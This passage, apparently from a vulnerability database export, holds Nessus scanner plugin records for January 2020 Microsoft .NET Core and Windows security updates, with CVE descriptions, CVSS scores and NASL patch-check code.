vulnerability could cause a denial of service against an ASP.NET Core web application.\n The vulnerability can be exploited remotely, without authentication. A remote unauthenticated attacker could exploit this vulnerability by issuing specially crafted requests to the ASP.NET Core application. (CVE-2020-0602)\n\n - A remote code execution vulnerability exists in ASP.NET Core software when the software fails to handle objects in memory. An attacker who successfully exploited the vulnerability could run arbitrary code in the context of the current user. If the current user is logged on with administrative user rights, an attacker could take control of the affected system. 
An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights. (CVE-2020-0603)\n\n - A remote code execution vulnerability exists in .NET software when the software fails to check the source markup of a file. An attacker who successfully exploited the vulnerability could run arbitrary code in the context of the current user. If the current user is logged on with administrative user rights, an attacker could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights. (CVE-2020-0605, CVE-2020-0606)", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2020-01-16T00:00:00", "type": "nessus", "title": "Security Update for .NET Core SDK (January 2020)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-0602", "CVE-2020-0603", "CVE-2020-0605", "CVE-2020-0606"], "modified": "2020-05-15T00:00:00", "cpe": ["cpe:/a:microsoft:.net_core"], "id": "SMB_NT_MS20_JAN_DOTNET_CORE_SDK.NASL", "href": "https://www.tenable.com/plugins/nessus/132994", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(132994);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/05/15\");\n\n script_cve_id(\n \"CVE-2020-0602\",\n \"CVE-2020-0603\",\n \"CVE-2020-0605\",\n \"CVE-2020-0606\"\n );\n script_xref(name:\"IAVA\", value:\"2020-A-0031-S\");\n\n script_name(english:\"Security Update for .NET Core SDK (January 2020)\");\n script_summary(english:\"Checks for Windows Install of 
.NET Core SDK.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple .NET Core SDK vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The Microsoft .NET Core SDK installation on the remote host is version 2.1.x < 2.1.511 or 2.1.608, 3.0.x < 3.0.102, or\n3.1.x < 3.1.101. It is, therefore, affected by multiple vulnerabilities:\n\n - A denial of service vulnerability exists when ASP.NET Core improperly handles web requests. An attacker who\n successfully exploited this vulnerability could cause a denial of service against an ASP.NET Core web application.\n The vulnerability can be exploited remotely, without authentication. A remote unauthenticated attacker could\n exploit this vulnerability by issuing specially crafted requests to the ASP.NET Core application. (CVE-2020-0602)\n\n - A remote code execution vulnerability exists in ASP.NET Core software when the software fails to handle objects in\n memory. An attacker who successfully exploited the vulnerability could run arbitrary code in the context of the\n current user. If the current user is logged on with administrative user rights, an attacker could take control of\n the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts\n with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less\n impacted than users who operate with administrative user rights. (CVE-2020-0603)\n\n - A remote code execution vulnerability exists in .NET software when the software fails to check the source markup of\n a file. An attacker who successfully exploited the vulnerability could run arbitrary code in the context of the\n current user. If the current user is logged on with administrative user rights, an attacker could take control of\n the affected system. 
An attacker could then install programs; view, change, or delete data; or create new accounts\n with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less\n impacted than users who operate with administrative user rights. (CVE-2020-0605, CVE-2020-0606)\");\n # https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0605\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?4e287012\");\n # https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0606\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?fa0a6c3c\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/dotnet/announcements/issues/148\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/dotnet/announcements/issues/149\");\n # https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0602\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?530ba67f\");\n # https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0603\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?374d2043\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/aspnet/Announcements/issues/402\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/aspnet/Announcements/issues/403\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/dotnet/aspnetcore/issues/18336\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/dotnet/aspnetcore/issues/18337\");\n script_set_attribute(attribute:\"solution\", value:\n\"Refer to vendor documentation.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n 
script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-0606\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/01/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/01/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/01/16\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:.net_core\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"microsoft_dotnet_core_sdk_win.nbin\");\n script_require_keys(\"installed_sw/.NET Core SDK Windows\", \"Settings/ParanoidReport\");\n script_require_ports(139, 445);\n\n exit(0);\n}\n\ninclude('vcf.inc');\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\napp = '.NET Core SDK Windows';\n\napp_info = vcf::get_app_info(app:app, win_local:TRUE);\n\nconstraints = [\n { 'min_version' : '2.1', 'fixed_version' : '2.1.511' },\n { 'min_version' : '2.1.600', 'fixed_version' : '2.1.608'},\n { 'min_version' : '3.0.0', 'fixed_version' : '3.0.102' },\n { 'min_version' : '3.1.0', 'fixed_version' : '3.1.101' }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-16T15:25:32", "description": "The remote Windows host is missing security update 4534312 or cumulative update 4534303. 
It is, therefore, affected by multiple vulnerabilities :\n\n - An information disclosure vulnerability exists in the Windows Common Log File System (CLFS) driver when it fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could potentially read data that was not intended to be disclosed. Note that this vulnerability would not allow an attacker to execute code or to elevate their user rights directly, but it could be used to obtain information that could be used to try to further compromise the affected system. (CVE-2020-0615, CVE-2020-0639)\n\n - An elevation of privilege vulnerability exists in Windows when the Win32k component fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0642)\n\n - A remote code execution vulnerability exists in .NET software when the software fails to check the source markup of a file. An attacker who successfully exploited the vulnerability could run arbitrary code in the context of the current user. If the current user is logged on with administrative user rights, an attacker could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-0605, CVE-2020-0606)\n\n - An elevation of privilege vulnerability exists in Microsoft Windows when Windows fails to properly handle certain symbolic links. An attacker who successfully exploited this vulnerability could potentially set certain items to run at a higher level and thereby elevate permissions. 
(CVE-2020-0635)\n\n - An information disclosure vulnerability exists in the way that the Windows Graphics Device Interface Plus (GDI+) handles objects in memory, allowing an attacker to retrieve information from a targeted system. By itself, the information disclosure does not allow arbitrary code execution; however, it could allow arbitrary code to be run if the attacker uses it in combination with another vulnerability. (CVE-2020-0643)\n\n - An information disclosure vulnerability exists when the win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability could obtain information to further compromise the user's system. (CVE-2020-0608)\n\n - An elevation of privilege vulnerability exists when Microsoft Cryptographic Services improperly handles files. An attacker could exploit the vulnerability to overwrite or modify a protected file leading to a privilege escalation. (CVE-2020-0620)\n\n - An elevation of privilege vulnerability exists when the Windows Common Log File System (CLFS) driver improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run processes in an elevated context. (CVE-2020-0634)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Search Indexer handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-0625, CVE-2020-0626, CVE-2020-0627, CVE-2020-0628, CVE-2020-0629, CVE-2020-0630, CVE-2020-0631, CVE-2020-0632)\n\n - A remote code execution vulnerability exists when the Microsoft .NET Framework fails to validate input properly. An attacker who successfully exploited this vulnerability could take control of an affected system.\n An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. 
Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.\n (CVE-2020-0646)\n\n - A remote code execution vulnerability exists when Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2020-0640)", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2020-01-14T00:00:00", "type": "nessus", "title": "KB4534312: Windows Server 2008 January 2020 Security Update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-0605", "CVE-2020-0606", "CVE-2020-0608", "CVE-2020-0615", "CVE-2020-0620", "CVE-2020-0625", "CVE-2020-0626", "CVE-2020-0627", "CVE-2020-0628", "CVE-2020-0629", "CVE-2020-0630", "CVE-2020-0631", "CVE-2020-0632", "CVE-2020-0634", "CVE-2020-0635", "CVE-2020-0639", "CVE-2020-0640", "CVE-2020-0642", "CVE-2020-0643", "CVE-2020-0646"], "modified": "2021-11-30T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS20_JAN_4534303.NASL", "href": "https://www.tenable.com/plugins/nessus/132864", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\n\n\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. 
The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\n\n\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(132864);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/11/30\");\n\n script_cve_id(\n \"CVE-2020-0605\",\n \"CVE-2020-0606\",\n \"CVE-2020-0608\",\n \"CVE-2020-0615\",\n \"CVE-2020-0620\",\n \"CVE-2020-0625\",\n \"CVE-2020-0626\",\n \"CVE-2020-0627\",\n \"CVE-2020-0628\",\n \"CVE-2020-0629\",\n \"CVE-2020-0630\",\n \"CVE-2020-0631\",\n \"CVE-2020-0632\",\n \"CVE-2020-0634\",\n \"CVE-2020-0635\",\n \"CVE-2020-0639\",\n \"CVE-2020-0640\",\n \"CVE-2020-0642\",\n \"CVE-2020-0643\",\n \"CVE-2020-0646\"\n );\n script_xref(name:\"MSKB\", value:\"4534312\");\n script_xref(name:\"MSKB\", value:\"4534303\");\n script_xref(name:\"MSFT\", value:\"MS20-4534312\");\n script_xref(name:\"MSFT\", value:\"MS20-4534303\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"KB4534312: Windows Server 2008 January 2020 Security Update\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4534312\nor cumulative update 4534303. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - An information disclosure vulnerability exists in the\n Windows Common Log File System (CLFS) driver when it\n fails to properly handle objects in memory. An attacker\n who successfully exploited this vulnerability could\n potentially read data that was not intended to be\n disclosed. Note that this vulnerability would not allow\n an attacker to execute code or to elevate their user\n rights directly, but it could be used to obtain\n information that could be used to try to further\n compromise the affected system. 
(CVE-2020-0615,\n CVE-2020-0639)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2020-0642)\n\n - A remote code execution vulnerability exists in .NET\n software when the software fails to check the source\n markup of a file. An attacker who successfully exploited\n the vulnerability could run arbitrary code in the\n context of the current user. If the current user is\n logged on with administrative user rights, an attacker\n could take control of the affected system. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2020-0605, CVE-2020-0606)\n\n - An elevation of privilege vulnerability exists in\n Microsoft Windows when Windows fails to properly handle\n certain symbolic links. An attacker who successfully\n exploited this vulnerability could potentially set\n certain items to run at a higher level and thereby\n elevate permissions. (CVE-2020-0635)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface Plus\n (GDI+) handles objects in memory, allowing an attacker\n to retrieve information from a targeted system. By\n itself, the information disclosure does not allow\n arbitrary code execution; however, it could allow\n arbitrary code to be run if the attacker uses it in\n combination with another vulnerability. (CVE-2020-0643)\n\n - An information disclosure vulnerability exists when the\n win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. 
(CVE-2020-0608)\n\n - An elevation of privilege vulnerability exists when\n Microsoft Cryptographic Services improperly handles\n files. An attacker could exploit the vulnerability to\n overwrite or modify a protected file leading to a\n privilege escalation. (CVE-2020-0620)\n\n - An elevation of privilege vulnerability exists when the\n Windows Common Log File System (CLFS) driver improperly\n handles objects in memory. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. (CVE-2020-0634)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Search Indexer handles objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute code with elevated\n permissions. (CVE-2020-0625, CVE-2020-0626,\n CVE-2020-0627, CVE-2020-0628, CVE-2020-0629,\n CVE-2020-0630, CVE-2020-0631, CVE-2020-0632)\n\n - A remote code execution vulnerability exists when the\n Microsoft .NET Framework fails to validate input\n properly. An attacker who successfully exploited this\n vulnerability could take control of an affected system.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. Users whose accounts are configured to have\n fewer user rights on the system could be less impacted\n than users who operate with administrative user rights.\n (CVE-2020-0646)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. 
(CVE-2020-0640)\");\n # https://support.microsoft.com/en-us/help/4534312/windows-server-2008-update-kb4534312\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?8064e787\");\n # https://support.microsoft.com/en-us/help/4534303/windows-server-2008-update-kb4534303\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?6d835d75\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB4534312 or Cumulative Update KB4534303.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-0646\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SharePoint Workflows XOML Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/01/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/01/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/01/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS20-01\";\nkbs = make_list('4534303', '4534312');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(vista:'2') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"6.0\",\n sp:2,\n rollup_date:\"01_2020\",\n bulletin:bulletin,\n rollup_kb_list:[4534303, 4534312])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-16T15:24:48", "description": "The remote Windows host is missing security update 4534314 or cumulative update 4534310. It is, therefore, affected by multiple vulnerabilities :\n\n - An information disclosure vulnerability exists when Remote Desktop Web Access improperly handles credential information. An attacker who successfully exploited this vulnerability could obtain legitimate users' credentials. 
(CVE-2020-0637)\n\n - An information disclosure vulnerability exists in the Windows Common Log File System (CLFS) driver when it fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could potentially read data that was not intended to be disclosed. Note that this vulnerability would not allow an attacker to execute code or to elevate their user rights directly, but it could be used to obtain information that could be used to try to further compromise the affected system. (CVE-2020-0615, CVE-2020-0639)\n\n - An elevation of privilege vulnerability exists in Windows when the Win32k component fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0642)\n\n - A remote code execution vulnerability exists in .NET software when the software fails to check the source markup of a file. An attacker who successfully exploited the vulnerability could run arbitrary code in the context of the current user. If the current user is logged on with administrative user rights, an attacker could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-0605, CVE-2020-0606)\n\n - An elevation of privilege vulnerability exists in Microsoft Windows when Windows fails to properly handle certain symbolic links. An attacker who successfully exploited this vulnerability could potentially set certain items to run at a higher level and thereby elevate permissions. (CVE-2020-0635)\n\n - An information disclosure vulnerability exists in the way that the Windows Graphics Device Interface Plus (GDI+) handles objects in memory, allowing an attacker to retrieve information from a targeted system. 
By itself, the information disclosure does not allow arbitrary code execution; however, it could allow arbitrary code to be run if the attacker uses it in combination with another vulnerability. (CVE-2020-0643)\n\n - A remote code execution vulnerability exists when Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2020-0640)\n\n - An information disclosure vulnerability exists when the win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability could obtain information to further compromise the user's system. (CVE-2020-0608)\n\n - An elevation of privilege vulnerability exists when Microsoft Cryptographic Services improperly handles files. An attacker could exploit the vulnerability to overwrite or modify a protected file leading to a privilege escalation. (CVE-2020-0620)\n\n - An elevation of privilege vulnerability exists when the Windows Common Log File System (CLFS) driver improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run processes in an elevated context. (CVE-2020-0634)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Search Indexer handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-0625, CVE-2020-0626, CVE-2020-0627, CVE-2020-0628, CVE-2020-0629, CVE-2020-0630, CVE-2020-0631, CVE-2020-0632)\n\n - An information disclosure vulnerability exists in the way that Microsoft Graphics Components handle objects in memory. An attacker who successfully exploited the vulnerability could obtain information that could be useful for further exploitation. 
(CVE-2020-0607)\n\n - A remote code execution vulnerability exists when the Microsoft .NET Framework fails to validate input properly. An attacker who successfully exploited this vulnerability could take control of an affected system.\n An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.\n (CVE-2020-0646)\n\n - A remote code execution vulnerability exists in the Windows Remote Desktop Client when a user connects to a malicious server. An attacker who successfully exploited this vulnerability could execute arbitrary code on the computer of the connecting client. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-0611)", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2020-01-14T00:00:00", "type": "nessus", "title": "KB4534314: Windows 7 and Windows Server 2008 R2 January 2020 Security Update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-0605", "CVE-2020-0606", "CVE-2020-0607", "CVE-2020-0608", "CVE-2020-0611", "CVE-2020-0615", "CVE-2020-0620", "CVE-2020-0625", "CVE-2020-0626", "CVE-2020-0627", "CVE-2020-0628", "CVE-2020-0629", "CVE-2020-0630", "CVE-2020-0631", "CVE-2020-0632", "CVE-2020-0634", "CVE-2020-0635", "CVE-2020-0637", "CVE-2020-0639", "CVE-2020-0640", "CVE-2020-0642", "CVE-2020-0643", "CVE-2020-0646"], "modified": "2021-11-30T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS20_JAN_4534310.NASL", "href": "https://www.tenable.com/plugins/nessus/132866", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\n\n\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. 
The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\n\n\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(132866);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/11/30\");\n\n script_cve_id(\n \"CVE-2020-0605\",\n \"CVE-2020-0606\",\n \"CVE-2020-0607\",\n \"CVE-2020-0608\",\n \"CVE-2020-0611\",\n \"CVE-2020-0615\",\n \"CVE-2020-0620\",\n \"CVE-2020-0625\",\n \"CVE-2020-0626\",\n \"CVE-2020-0627\",\n \"CVE-2020-0628\",\n \"CVE-2020-0629\",\n \"CVE-2020-0630\",\n \"CVE-2020-0631\",\n \"CVE-2020-0632\",\n \"CVE-2020-0634\",\n \"CVE-2020-0635\",\n \"CVE-2020-0637\",\n \"CVE-2020-0639\",\n \"CVE-2020-0640\",\n \"CVE-2020-0642\",\n \"CVE-2020-0643\",\n \"CVE-2020-0646\"\n );\n script_xref(name:\"MSKB\", value:\"4534310\");\n script_xref(name:\"MSKB\", value:\"4534314\");\n script_xref(name:\"MSFT\", value:\"MS20-4534310\");\n script_xref(name:\"MSFT\", value:\"MS20-4534314\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"KB4534314: Windows 7 and Windows Server 2008 R2 January 2020 Security Update\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4534314\nor cumulative update 4534310. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - An information disclosure vulnerability exists when\n Remote Desktop Web Access improperly handles credential\n information. An attacker who successfully exploited this\n vulnerability could obtain legitimate users'\n credentials. (CVE-2020-0637)\n\n - An information disclosure vulnerability exists in the\n Windows Common Log File System (CLFS) driver when it\n fails to properly handle objects in memory. 
An attacker\n who successfully exploited this vulnerability could\n potentially read data that was not intended to be\n disclosed. Note that this vulnerability would not allow\n an attacker to execute code or to elevate their user\n rights directly, but it could be used to obtain\n information that could be used to try to further\n compromise the affected system. (CVE-2020-0615,\n CVE-2020-0639)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2020-0642)\n\n - A remote code execution vulnerability exists in .NET\n software when the software fails to check the source\n markup of a file. An attacker who successfully exploited\n the vulnerability could run arbitrary code in the\n context of the current user. If the current user is\n logged on with administrative user rights, an attacker\n could take control of the affected system. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2020-0605, CVE-2020-0606)\n\n - An elevation of privilege vulnerability exists in\n Microsoft Windows when Windows fails to properly handle\n certain symbolic links. An attacker who successfully\n exploited this vulnerability could potentially set\n certain items to run at a higher level and thereby\n elevate permissions. (CVE-2020-0635)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface Plus\n (GDI+) handles objects in memory, allowing an attacker\n to retrieve information from a targeted system. 
By\n itself, the information disclosure does not allow\n arbitrary code execution; however, it could allow\n arbitrary code to be run if the attacker uses it in\n combination with another vulnerability. (CVE-2020-0643)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2020-0640)\n\n - An information disclosure vulnerability exists when the\n win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-0608)\n\n - An elevation of privilege vulnerability exists when\n Microsoft Cryptographic Services improperly handles\n files. An attacker could exploit the vulnerability to\n overwrite or modify a protected file leading to a\n privilege escalation. (CVE-2020-0620)\n\n - An elevation of privilege vulnerability exists when the\n Windows Common Log File System (CLFS) driver improperly\n handles objects in memory. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. (CVE-2020-0634)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Search Indexer handles objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute code with elevated\n permissions. (CVE-2020-0625, CVE-2020-0626,\n CVE-2020-0627, CVE-2020-0628, CVE-2020-0629,\n CVE-2020-0630, CVE-2020-0631, CVE-2020-0632)\n\n - An information disclosure vulnerability exists in the\n way that Microsoft Graphics Components handle objects in\n memory. 
An attacker who successfully exploited the\n vulnerability could obtain information that could be\n useful for further exploitation. (CVE-2020-0607)\n\n - A remote code execution vulnerability exists when the\n Microsoft .NET Framework fails to validate input\n properly. An attacker who successfully exploited this\n vulnerability could take control of an affected system.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. Users whose accounts are configured to have\n fewer user rights on the system could be less impacted\n than users who operate with administrative user rights.\n (CVE-2020-0646)\n\n - A remote code execution vulnerability exists in the\n Windows Remote Desktop Client when a user connects to a\n malicious server. An attacker who successfully exploited\n this vulnerability could execute arbitrary code on the\n computer of the connecting client. An attacker could\n then install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2020-0611)\");\n # https://support.microsoft.com/en-us/help/4534310/windows-7-update-kb4534310\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?5bc50ca4\");\n # https://support.microsoft.com/en-us/help/4534314/windows-7-update-kb4534314\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?8d29d5dd\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB4534314 or Cumulative Update KB4534310.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n 